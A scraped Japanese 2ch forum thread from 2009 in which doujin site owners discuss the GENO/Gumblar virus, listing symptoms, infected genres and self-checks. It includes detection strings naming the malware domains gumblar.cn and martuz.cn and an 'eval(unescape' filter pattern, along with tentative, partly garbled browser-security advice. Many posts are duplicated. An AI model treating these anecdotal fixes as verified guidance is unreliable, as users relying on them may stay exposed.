FTPもクレジットカードも使わないから、あんま危機感ないけど他の人はそうじゃないもんな。
ここ二ヶ月くらい同人サイト巡ってなくて逆によかったかもなぁ。
>>900
スレ立てヨロ
スレ立てヨロ
感染したらどうなるってのも変えた方が良いんじゃないの?
サイトが勝手に書き換えられて閲覧者にも感染するのが一番押し出されてるのが同人板らしいと言えばらしいが
コピペだけど
主な症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
サイトが勝手に書き換えられて閲覧者にも感染するのが一番押し出されてるのが同人板らしいと言えばらしいが
コピペだけど
主な症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
ノートンさんではなくAVG(って名前だったと思う)というウィルス対策ソフトを
入れてたんだけど、avast入れる前にアンインストール済み。
黒い画面にはメモリサイズやらポートがどうのってのが英語で書かれてて
device listing.....
って書いてある。
今までも似たようなのは時々でてたんだけど、その時は
F1押してコンテイニューF2でセットアップみたいなのがあったけど今回はなにもなし…。
入れてたんだけど、avast入れる前にアンインストール済み。
黒い画面にはメモリサイズやらポートがどうのってのが英語で書かれてて
device listing.....
って書いてある。
今までも似たようなのは時々でてたんだけど、その時は
F1押してコンテイニューF2でセットアップみたいなのがあったけど今回はなにもなし…。
あれ900だ。スレ立て初めてだからちょっと待っててくれ。
テンプレは>>735に前スレ足したくらいでおk?
テンプレは>>735に前スレ足したくらいでおk?
906 :GENO:2009/05/17(日) 04:45:49 ID:ftzmyvI20
感染しちゃうと再起動できなくなるん?
火狐のgooooooogleの先読みは結局弄って無効にするのも意味ないってことになったのか
>904
セーフモードで起動して一旦それアンインストールしてみたら?
それでもダメだったらリカバれ
セーフモードで起動して一旦それアンインストールしてみたら?
それでもダメだったらリカバれ
911 : :2009/05/17(日) 04:52:25 ID:AOBhVWJb0
>>905
うん。で>>3にこれを
主な症状
・感染後にFTPに接続するとログイン情報が送信され勝手にFTP上のファイルを改竄される
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集している恐れ
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
うん。で>>3にこれを
主な症状
・感染後にFTPに接続するとログイン情報が送信され勝手にFTP上のファイルを改竄される
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集している恐れ
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
>>908
全員が全員同じ症状が出るわけでは無い
PCによってバラバラ
けど、やたらと「〜じゃないから大丈夫だよね」とかレスする人が多いなぁと
今回感染していなかったから今後も安心とは思わず警戒心を持ち続けて欲しいなぁ
これ以外にもウィルスは無限にあるし
全員が全員同じ症状が出るわけでは無い
PCによってバラバラ
けど、やたらと「〜じゃないから大丈夫だよね」とかレスする人が多いなぁと
今回感染していなかったから今後も安心とは思わず警戒心を持ち続けて欲しいなぁ
これ以外にもウィルスは無限にあるし
sqlsodbcやコマンドとか、感染症状に引っ掛かかりまくり感染濃厚だったので
自サイト確認しようと思ったけど
まとめサイトに載ってる感染チェッカーがうまく動いてくれないから
自サイトのソース虱潰しにあたった…ら感染してた
全部のファイルじゃなくて全体の約7〜8%くらい
パッと見で無いからって安心しないほうがいいかも
ちなみに最近アップしたファイルはまったく感染してなくて、4月半ば頃のがダメだった
ただ同じ日にアップしたのでも感染してるのとしてないのがある
感染してるページは他ページより明らかに重かった
今からどーしてもいるファイルだけバックアップとってクリーンインスコしてサイトに謝罪説明載せてくる
こりゃ今日は潰れるな
このスレ知らなかったら二次災害広げるとこだった
スレの皆さんやまとめの中の人に感謝
皆さんも気を付けてください
>>3
ジャンルは以前出ていましたがポケモソです
自サイト確認しようと思ったけど
まとめサイトに載ってる感染チェッカーがうまく動いてくれないから
自サイトのソース虱潰しにあたった…ら感染してた
全部のファイルじゃなくて全体の約7〜8%くらい
パッと見で無いからって安心しないほうがいいかも
ちなみに最近アップしたファイルはまったく感染してなくて、4月半ば頃のがダメだった
ただ同じ日にアップしたのでも感染してるのとしてないのがある
感染してるページは他ページより明らかに重かった
今からどーしてもいるファイルだけバックアップとってクリーンインスコしてサイトに謝罪説明載せてくる
こりゃ今日は潰れるな
このスレ知らなかったら二次災害広げるとこだった
スレの皆さんやまとめの中の人に感謝
皆さんも気を付けてください
>>3
ジャンルは以前出ていましたがポケモソです
78にもあったけど、
>とりあえず感染したら 必要なファイルは外付けに移動
これはアリなのかな?
外付けにウイルスがうつるんじゃなかろか…
>とりあえず感染したら 必要なファイルは外付けに移動
これはアリなのかな?
外付けにウイルスがうつるんじゃなかろか…
>>914
最近のが感染してないっていうのは「まだ改竄されてない」だけだね。
最近のが感染してないっていうのは「まだ改竄されてない」だけだね。
>>910
セーフモードで起動できなかった…orz
先日内蔵CD-RWドライバが認識されなくなったのでリカバリーCD読めないんだ。
買い換えようと思って外付HDDにデータ移す前に最終チェックしようとしたんだけど、裏目にでたみたい
セーフモードで起動できなかった…orz
先日内蔵CD-RWドライバが認識されなくなったのでリカバリーCD読めないんだ。
買い換えようと思って外付HDDにデータ移す前に最終チェックしようとしたんだけど、裏目にでたみたい
>・一部のアンチウイルスソフトが更新不能
具体的にどのソフトだよ…orz
具体的にどのソフトだよ…orz
919 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 05:17:42 ID:YDbXlkzx0
920 : :2009/05/17(日) 05:21:29 ID:krnr9W4t0
【管理も】同人サイト・GENOウィルス注意5【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242503523/
http://changi.2ch.net/test/read.cgi/doujin/1242503523/
firefoxのアドオンの「noscript」って対策にはなるのかな?
>>922
オプションから有効を切っても同じと見たのでそれでもいいんじゃない
オプションから有効を切っても同じと見たのでそれでもいいんじゃない
普通にjavaスクリプトを無効にすりゃいいんじゃないの?
何故あどおん
何故あどおん
創作イラスト
うみねこのなく頃に
で感染発見。
うみねこのなく頃に
で感染発見。
粘には燃を
firefoxの先読みが結局停止したほうがいいのか意味ないのかがわからない
確定情報とれるまではどの道停止しといたほうがベターってこと?
確定情報とれるまではどの道停止しといたほうがベターってこと?
一週間ほど前に歴史ジャンルのサーチを開いたらavastがトロイを検出したことがあったんだが、あれはもしかしてこのウィルスだったんだろうか?
感染ジャンル一覧には載っておらず、自分のパソコンは白
もう一度確かめて一覧に載せてもらった方がいいだろうか
感染ジャンル一覧には載っておらず、自分のパソコンは白
もう一度確かめて一覧に載せてもらった方がいいだろうか
特に何も進展無いのに進み早いわ
>>928
安全側に倒そうとするとキリがないけど、気になるなら切ったらいいと思う。
どうせブロードバンドだし先読みの効果は大したもんじゃないだろうから。
あれはサイト側がタグなりヘッダなりで指示してないかぎり先読みしないし、
先読みでキャッシュされても開かなきゃ問題は起きない。
>>929
ジャンル一覧って誰か確認してるのかな。それほど深刻に考えなくてもよさげ。
安全側に倒そうとするとキリがないけど、気になるなら切ったらいいと思う。
どうせブロードバンドだし先読みの効果は大したもんじゃないだろうから。
あれはサイト側がタグなりヘッダなりで指示してないかぎり先読みしないし、
先読みでキャッシュされても開かなきゃ問題は起きない。
>>929
ジャンル一覧って誰か確認してるのかな。それほど深刻に考えなくてもよさげ。
カスペで完全スキャンしたら、赤くなって
>>464と同じく、全部ノートンのだった。
サイトで、ウイルスのことと、その確認と対策をとったことに触れようかと思ったけど
PCからになるから、今はupしない方がいいのかな?
みんな更新休んでる?
>>464と同じく、全部ノートンのだった。
サイトで、ウイルスのことと、その確認と対策をとったことに触れようかと思ったけど
PCからになるから、今はupしない方がいいのかな?
みんな更新休んでる?
感染してなけりゃ更新すればいいじゃない。
現時点で感染してないの確認して、自分のサイトから
まとめサイトにリンク張っておいた。それ以外は通常更新
まとめサイトにリンク張っておいた。それ以外は通常更新
936 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 05:51:09 ID:YDbXlkzx0
即刻更新すべきだと思う
二次感染者いたら事だよ
二次感染者いたら事だよ
確認はしてほしいけど>>929が直接行かなくてもチェックはできる。
以下コピペ
サイトが感染してるのかわからない人は
http://wepawet.cs.ucsb.edu/
にアクセスするといいかも、とのことです。
ここで「URL」と書かれている右のフォームに
感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。
(何も見つからなければ少なくとも現在は感染していない。
見つかればそのサイトは感染している。 )
以下コピペ
サイトが感染してるのかわからない人は
http://wepawet.cs.ucsb.edu/
にアクセスするといいかも、とのことです。
ここで「URL」と書かれている右のフォームに
感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。
(何も見つからなければ少なくとも現在は感染していない。
見つかればそのサイトは感染している。 )
何らかの方法で(「リンク先を保存」など)ページを開かずにダウンロードして、
メモ帳等でソース自体を直接調べて特有のおかしな記述がないか探すことも出来る
保存したhtmlを間違えてブラウザで開くと大変だけど
メモ帳等でソース自体を直接調べて特有のおかしな記述がないか探すことも出来る
保存したhtmlを間違えてブラウザで開くと大変だけど
ああやっと追いつけた…
質問なんだが VirSCAN.org ttp://www.virscan.org/ で調べるのって有効?
とりあえず先ほど話題になってたkernel32.dll、自分も2009/03/21 23:07:24だったので
いろいろやってここに辿り着いて、調べてみたらマルウェアはないって言われた
その他ノートン2009、avast、カスペオンラインスキャンで調べたときも反応なし。安心してよさげかな
質問なんだが VirSCAN.org ttp://www.virscan.org/ で調べるのって有効?
とりあえず先ほど話題になってたkernel32.dll、自分も2009/03/21 23:07:24だったので
いろいろやってここに辿り着いて、調べてみたらマルウェアはないって言われた
その他ノートン2009、avast、カスペオンラインスキャンで調べたときも反応なし。安心してよさげかな
sqlsodbcも異常無し
コマンドプロンプトもレジストリエディタも起動して
まー大丈夫だろと思ってサイト開いて
ソース確認したら見覚えのないスクリプトがあって泣きそうになった
と思ったらただの広告で脱力した
マジ勘弁してくれよFC2…
もうJAVAスクリプトの記述見るだけで嫌な汗かくわ
コマンドプロンプトもレジストリエディタも起動して
まー大丈夫だろと思ってサイト開いて
ソース確認したら見覚えのないスクリプトがあって泣きそうになった
と思ったらただの広告で脱力した
マジ勘弁してくれよFC2…
もうJAVAスクリプトの記述見るだけで嫌な汗かくわ
943 :GENO 報告 ←と入れましょう:2009/05/17(日) 06:01:55 ID:XO4QqA4D0
いつになったら収束するんだろう
拡大防ぎつつワクチン出るの待つしかないんだろうけど
拡大防ぎつつワクチン出るの待つしかないんだろうけど
FC2・・・
訂正
保存したhtmlを間違えてブラウザで開くと大変だけど
↓
そのページが感染していた場合、保存したhtmlを間違えてブラウザで開くと大変だけど
あとそのサイトのページのうち1ページだけ安全と確認しても
他のページがどうなってるかわからないよね
保存したhtmlを間違えてブラウザで開くと大変だけど
↓
そのページが感染していた場合、保存したhtmlを間違えてブラウザで開くと大変だけど
あとそのサイトのページのうち1ページだけ安全と確認しても
他のページがどうなってるかわからないよね
eval(unescapeなんてそうそう書かないからこれだけ弾けばいいかな
evalは特徴的すぎるからそのうち変えてくるんじゃないかな。
949 :GENO:2009/05/17(日) 06:10:40 ID:XJ6Ixs/70
ついさっき知ってwiki読んできたんだけど
基本JavaScriptオフにしてる人は勝ち組かな
基本JavaScriptオフにしてる人は勝ち組かな
東方(エロ男性向け)で感染確認('A`)
>evalは特徴的すぎるからそのうち変えてくる
こんだけ手の込んだウィルス出してるってことはそうよね〜
そのくらいするよね〜
悩ましい
こんだけ手の込んだウィルス出してるってことはそうよね〜
そのくらいするよね〜
悩ましい
せっかくのJPOPなIDが
>>951
すみません;
すみません;
これは二次創作への警告である。
とかだれか声明だしたらおもしろいな
とかだれか声明だしたらおもしろいな
小林製薬がやられて
今、成美堂出版がやられてる状況で…w
今、成美堂出版がやられてる状況で…w
957 :GENO 報告 925:2009/05/17(日) 06:31:45 ID:lMzpo2lq0
>>943
そうです。その2ジャンルで感染発見しました。
そうです。その2ジャンルで感染発見しました。
958 :GENO:2009/05/17(日) 06:36:41 ID:xeHWSKXvO
みんなおはよう
1時〜6時半の間に大きな進展とかあった?
マカフィーが入ってるんだけど、これは最新版に更新したところで機能してないって考えてOK?
ウイルスバスター入れたいけど、ググることもためらわれるし…
店でセキュリティソフトを買うまで、ネットできないのか……
1時〜6時半の間に大きな進展とかあった?
マカフィーが入ってるんだけど、これは最新版に更新したところで機能してないって考えてOK?
ウイルスバスター入れたいけど、ググることもためらわれるし…
店でセキュリティソフトを買うまで、ネットできないのか……
ネットゲーム(T/a/l/e/s/W/e/a/v/e/r)の同人サイトで感染みつけた
けっこう有名なサイトさんみたいだから広まるかもorz
とりあえず管理人さんにメール
リンク貼ってる知り合いにもメールしたけどどこまで抑えられるか…
けっこう有名なサイトさんみたいだから広まるかもorz
とりあえず管理人さんにメール
リンク貼ってる知り合いにもメールしたけどどこまで抑えられるか…
今気づいたんだが株式会社まどかって美蕾の親元のことだったのか
株式会社まどかのドメインと美蕾ブランドのドメインとあるけど、これ美蕾は大丈夫ってことなのか…?
株式会社まどかのドメインと美蕾ブランドのドメインとあるけど、これ美蕾は大丈夫ってことなのか…?
961 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 06:42:10 ID:tr/fKv7z0
>>958
OK
OK
自分のサイトも感染していたんだが
こんな時に限ってパスワードを紛失してしまい削除が出来ない
サーバに問い合わせたが郵送で一週間かかるオワタ
過疎サイトだったのがせめてもの救いか…
こんな時に限ってパスワードを紛失してしまい削除が出来ない
サーバに問い合わせたが郵送で一週間かかるオワタ
過疎サイトだったのがせめてもの救いか…
963 :geno:2009/05/17(日) 06:43:26 ID:9SZ0CANWO
トライアル版DLしちゃえば?
自分はカスペのトライアル版昨日いれたよ。
自分はカスペのトライアル版昨日いれたよ。
965 : :2009/05/17(日) 06:45:22 ID:z6BofXlS0
ごめん自分で確認した
まどかの方はソース読もうと思ってページ保存しようとしたらavastに怒られた
美蕾は無反応だったよ
まどかの方はソース読もうと思ってページ保存しようとしたらavastに怒られた
美蕾は無反応だったよ
バスター・ノートン他有名どころもこれに関しては完全に後手後手らしいね
早い段階から検出できたのがカスペルスキーとavast!だけだとか
早い段階から検出できたのがカスペルスキーとavast!だけだとか
968 :GENO:2009/05/17(日) 06:54:17 ID:FnPZ+X/U0
怖くてググれないって人はw3mとかlynxとか入れたらいいんじゃないか
見られないサイトもあるけど、調べ物するくらいは出来るよ
見られないサイトもあるけど、調べ物するくらいは出来るよ
970 : :2009/05/17(日) 06:57:53 ID:8Mc+KfJt0
伺かのゴースト配布サイトで感染確認
>>971
個人サイトかサーチか?
個人サイトかサーチか?
>>965
23 名前:以下、名無しにかわりましてVIPがお送りします [sage] 投稿日:2009/05/17(日) 03:14:05.95 ID:5FyWFSdq0 New!!
火狐使いは特に注意。対策しないと感染サイト名をググっただけで感染します
563 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:50:34.81 ID:K/FFIX2k
>>516
FireFoxの先読み機能を切っておけ
google検索上位に感染ページがランクインしたとたんにウィルスロードしはじめるよw
アドレス欄にabout:configで
network.prefech-nextをfalseだ
23 名前:以下、名無しにかわりましてVIPがお送りします [sage] 投稿日:2009/05/17(日) 03:14:05.95 ID:5FyWFSdq0 New!!
火狐使いは特に注意。対策しないと感染サイト名をググっただけで感染します
563 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:50:34.81 ID:K/FFIX2k
>>516
FireFoxの先読み機能を切っておけ
google検索上位に感染ページがランクインしたとたんにウィルスロードしはじめるよw
アドレス欄にabout:configで
network.prefech-nextをfalseだ
すまんWiki読んだがいまいちはっきりしない
とりあえず行きたいとこがあるときに>>937でセーフなら大丈夫なんか?
それと万一自分が感染した場合に心配しなきゃならんことってなんだ?
サイト持ちは更新ご法度ってことはわかったが、ROMの受ける被害は?
(Winに記憶させたパス抜かれるとかPC内のデータ改ざんされるとか)
とりあえず行きたいとこがあるときに>>937でセーフなら大丈夫なんか?
それと万一自分が感染した場合に心配しなきゃならんことってなんだ?
サイト持ちは更新ご法度ってことはわかったが、ROMの受ける被害は?
(Winに記憶させたパス抜かれるとかPC内のデータ改ざんされるとか)
976 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 07:25:00 ID:B/lYlGwY0
近くだから読むべきだった
975サンクス
しかし937のサイト試してみてるがクソ重いな
やっぱ人が殺到してんのかな
975サンクス
しかし937のサイト試してみてるがクソ重いな
やっぱ人が殺到してんのかな
977 : :2009/05/17(日) 07:25:07 ID:8Mc+KfJt0
>>974
とりあえずJavaScript切ってあればおそらく感染したサイト開いても大丈夫(確証はない)。
ちなみに>>937でわかるのはあくまで調べたページのみで、そのサイトの他のページが
どうであるかはわからない。
とりあえずJavaScript切ってあればおそらく感染したサイト開いても大丈夫(確証はない)。
ちなみに>>937でわかるのはあくまで調べたページのみで、そのサイトの他のページが
どうであるかはわからない。
>>973
おそらくウイルスをロードしてるんじゃなくて、ウイルスを読み込ませるためのjsを
ロードして(この時点で実行はされない)、そのjsにアンチウイルスソフトが反応する
だけっぽいような…気がする。
おそらくウイルスをロードしてるんじゃなくて、ウイルスを読み込ませるためのjsを
ロードして(この時点で実行はされない)、そのjsにアンチウイルスソフトが反応する
だけっぽいような…気がする。
>>3
まとめサイト管理更新乙。
細かいことだけど
まとめサイトの小野不由美の後ろのカッコ、
検索サイトにするかサーチサイトにするか総合サーチにするか
とにかく検索サーチという表現がムズムズするので
次更新の折にでも直してもらえると嬉しい
個人的な事なので無視可。
まとめサイト管理更新乙。
細かいことだけど
まとめサイトの小野不由美の後ろのカッコ、
検索サイトにするかサーチサイトにするか総合サーチにするか
とにかく検索サーチという表現がムズムズするので
次更新の折にでも直してもらえると嬉しい
個人的な事なので無視可。
ジャンルの違いもあるんだろうけど
正直自分の見える範囲だと同人板だけで急に盛り上がったようにしか見えない。
本スレ行ったら同人板の奴らが乗り込んできて急に加速したとか文句言われてたし
まとめからリンクされてる詳しいサイトも急にアクセス増えたって迷惑がってたよ
周知に効果あるだろうからって無関係なピクシブに凸したなんて話まであったよ……。
確かに周知は大事だけど、騒いで広めれば良いってものじゃないし
「ウイルスに気をつける」「アップデータは常に最新に」
こんなのはウイルスが流行ってなくてもやっておかなければならないことで
サイト管理人なら尚の事。だからこそ敏感で盛り上がってるんだろうけどさ。
迷惑かけるようなやり方や不安を煽るような真似だけは勘弁。
正直自分の見える範囲だと同人板だけで急に盛り上がったようにしか見えない。
本スレ行ったら同人板の奴らが乗り込んできて急に加速したとか文句言われてたし
まとめからリンクされてる詳しいサイトも急にアクセス増えたって迷惑がってたよ
周知に効果あるだろうからって無関係なピクシブに凸したなんて話まであったよ……。
確かに周知は大事だけど、騒いで広めれば良いってものじゃないし
「ウイルスに気をつける」「アップデータは常に最新に」
こんなのはウイルスが流行ってなくてもやっておかなければならないことで
サイト管理人なら尚の事。だからこそ敏感で盛り上がってるんだろうけどさ。
迷惑かけるようなやり方や不安を煽るような真似だけは勘弁。
男性向けエロと腐女子系とどっちが感染多いの
話はそれからだ
話はそれからだ
http://wepawet.cs.ucsb.edu/に頼らないで、
自分で開きたいページのソースをを片っ端から調べてもいい。
ブラウザで開く前に右クリ→「リンク先を保存」(?)などでHTMLファイルをダウンロードする。
保存したHTMLファイルを右クリなどしてメモ帳で開く(間違って普通に開かないように)。
そしてWikiに書いてあるような特有の文字列が見られるかを調べる
このウイルスによって改竄されたページのソースに現れるコードの一例
ttp://sakuratan.ddo.jp/imgboard/img-box/img20090517073301.jpg
自分で開きたいページのソースをを片っ端から調べてもいい。
ブラウザで開く前に右クリ→「リンク先を保存」(?)などでHTMLファイルをダウンロードする。
保存したHTMLファイルを右クリなどしてメモ帳で開く(間違って普通に開かないように)。
そしてWikiに書いてあるような特有の文字列が見られるかを調べる
このウイルスによって改竄されたページのソースに現れるコードの一例
ttp://sakuratan.ddo.jp/imgboard/img-box/img20090517073301.jpg
一例っておい
>>980
同人サイト、特に女性向けは閲覧者がサイト持ちである可能性が高い
つまりこのウィルスが爆発的に広がる可能性が高い
同人板の住人はサイト閲覧もするし、かつサイトを持っている人間が多い
つまりこのウィルスに対して危機感を抱く人間が多い
他の板とはちょっと事情が違うよ
同人サイト、特に女性向けは閲覧者がサイト持ちである可能性が高い
つまりこのウィルスが爆発的に広がる可能性が高い
同人板の住人はサイト閲覧もするし、かつサイトを持っている人間が多い
つまりこのウィルスに対して危機感を抱く人間が多い
他の板とはちょっと事情が違うよ
985 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 07:47:49 ID:cswFnkkL0
>>980
お前海外旅行にでも行って帰ってきたばかりか?
お前海外旅行にでも行って帰ってきたばかりか?
>>980です
>>984いやそれは解かってるんだけど熱くなられすぎると
逆に引くような人もいるでしょ?
見えない敵と戦う戦士みたいなの?
逆効果になりかねないくらい熱すぎるよ今の騒ぎっぷり
>>985
ニュー速で祭ってた時にちょっと参加してたくらい前から知ってる
だから余計に一歩引いてるのかもしれないかな
>>984いやそれは解かってるんだけど熱くなられすぎると
逆に引くような人もいるでしょ?
見えない敵と戦う戦士みたいなの?
逆効果になりかねないくらい熱すぎるよ今の騒ぎっぷり
>>985
ニュー速で祭ってた時にちょっと参加してたくらい前から知ってる
だから余計に一歩引いてるのかもしれないかな
987 :GENO:2009/05/17(日) 07:51:28 ID:c9KikWou0
>>982
DLしないでソースチェッカーオンラインにでも突っ込んだほうがよくない?
DLしないでソースチェッカーオンラインにでも突っ込んだほうがよくない?
特定のサイト閲覧のときだけ気を付ければいいってわけじゃなくて
ぶっちゃけほぼ全てのサイトをウイルス感染の危険性ありと疑って掛からなきゃならんのがな
大手ベンダーが対応するまではネットしないのが最善とかぬるぽ
ぶっちゃけほぼ全てのサイトをウイルス感染の危険性ありと疑って掛からなきゃならんのがな
大手ベンダーが対応するまではネットしないのが最善とかぬるぽ
>>988
ガッ
ガッ
992 :GENO:2009/05/17(日) 08:00:23 ID:c9KikWou0
>>980
同人だけ騒いで見えるのは、他だと閲覧のみって場合が多いからじゃね?
女性向けでいえば、BLとノマカプやアニメとゲーム系と
ジャンル間でギスギスしやすい所が責任の擦り付けしないで
報告上げてるってだけで感心するけどな
同人だけ騒いで見えるのは、他だと閲覧のみって場合が多いからじゃね?
女性向けでいえば、BLとノマカプやアニメとゲーム系と
ジャンル間でギスギスしやすい所が責任の擦り付けしないで
報告上げてるってだけで感心するけどな
何が分かってんだ
引くなら勝手に引いてりゃいいじゃん
大体実際見えない敵にも等しいし
クール気取るのは勝手だが
それで対策怠って感染してばらまくのはやめてくれよ
どうせサイトなんざ持ってないんだろうが
引くなら勝手に引いてりゃいいじゃん
大体実際見えない敵にも等しいし
クール気取るのは勝手だが
それで対策怠って感染してばらまくのはやめてくれよ
どうせサイトなんざ持ってないんだろうが
Mac板で同人テンプレ使って
デマまいてる馬鹿、いい加減にしろ。
注意喚起するなら正しい知識をもとにしてやれ
デマまいてる馬鹿、いい加減にしろ。
注意喚起するなら正しい知識をもとにしてやれ
997 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 08:19:09 ID:cswFnkkL0
>>980
セキュリティソフトでも対応できないようなもんが急速に規模拡大してるのにそれか
ましてや個人サイトの範囲では収まらず一般人が見るような大手の公式サイトまで感染してる状況で
リアルの豚インフルでクール気取って無警戒なバカと変わらん
セキュリティソフトでも対応できないようなもんが急速に規模拡大してるのにそれか
ましてや個人サイトの範囲では収まらず一般人が見るような大手の公式サイトまで感染してる状況で
リアルの豚インフルでクール気取って無警戒なバカと変わらん
そもそもこのウイルス出たのってもう一ヶ月以上前なんだよ
マルウェア系はあんまり対応されないのはいつものこと
別に楽観視しろと言ってるわけじゃない。
パス抜きウイルスは度々流行ってるけど、一般の人はかなり冷めてる
抜かれるパスに該当する何かを利用してなきゃ被害無いから、そのうちアンチソフトが対応してくれるまでそのままで。
亜種によってブルスク被害が出ているって話がホントなら今回はそうでもないだろうけど。
あちこちのマルチポストもウザがられてる。他所の板や感染してない大手サイトに警告の協力要請とかもうね。
警告にいくにしたってもう少し行儀良くしてほしいよ。
この板の内と外で温度差があることは自覚してくれ。
実際恥ずかしくてサイトの警告も下げて知らんぷりしたい管理人も出はじめてるよ
ここだってそのうち落ち着くと思ってるよ。いつまでも燃えてられるわけが無いもの。
週末を前に盛り上がったのが不運だな
マルウェア系はあんまり対応されないのはいつものこと
別に楽観視しろと言ってるわけじゃない。
パス抜きウイルスは度々流行ってるけど、一般の人はかなり冷めてる
抜かれるパスに該当する何かを利用してなきゃ被害無いから、そのうちアンチソフトが対応してくれるまでそのままで。
亜種によってブルスク被害が出ているって話がホントなら今回はそうでもないだろうけど。
あちこちのマルチポストもウザがられてる。他所の板や感染してない大手サイトに警告の協力要請とかもうね。
警告にいくにしたってもう少し行儀良くしてほしいよ。
この板の内と外で温度差があることは自覚してくれ。
実際恥ずかしくてサイトの警告も下げて知らんぷりしたい管理人も出はじめてるよ
ここだってそのうち落ち着くと思ってるよ。いつまでも燃えてられるわけが無いもの。
週末を前に盛り上がったのが不運だな
999 : :2009/05/17(日) 08:20:28 ID:QQYHhud10
>>980はそれほど間違ったこと言ってない
迷惑かけるようなやり方や不安を煽るような真似はしないことだ
迷惑かけるようなやり方や不安を煽るような真似はしないことだ
1000 :ホモ紳士 (‘/仝\’) ◆xsMI36idT6 :2009/05/17(日) 08:20:55 ID:7DsTBve+0
おはようございます
遊びに来ました(´`/仝)
遊びに来ました(´`/仝)
1001 :1001:
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
| 最 後 尾 。 | このスレッドは1000を超えました。
|________|
∧∧ ||
(. ゚д゚)|| 同人@2ch掲示板
/ づΦ http://changi.2ch.net/doujin/
| 最 後 尾 。 | このスレッドは1000を超えました。
|________|
∧∧ ||
(. ゚д゚)|| 同人@2ch掲示板
/ づΦ http://changi.2ch.net/doujin/